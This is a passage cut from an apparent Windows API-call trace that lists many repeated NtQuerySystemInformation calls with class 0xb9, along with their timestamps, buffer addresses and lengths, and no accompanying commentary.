Length=0x38, ResultLength=0x0) [0231.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.004] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x28, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0231.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0231.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x20, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x38, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd438, Length=0x58, ResultLength=0x0) [0231.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0231.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0231.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0231.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0231.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0231.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0231.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x28, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0231.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x28, ResultLength=0x0) [0231.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0231.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0231.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0231.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x20, ResultLength=0x0) [0231.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd220, Length=0x38, ResultLength=0x0) [0231.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0a0, Length=0x20, ResultLength=0x0) [0231.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0231.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 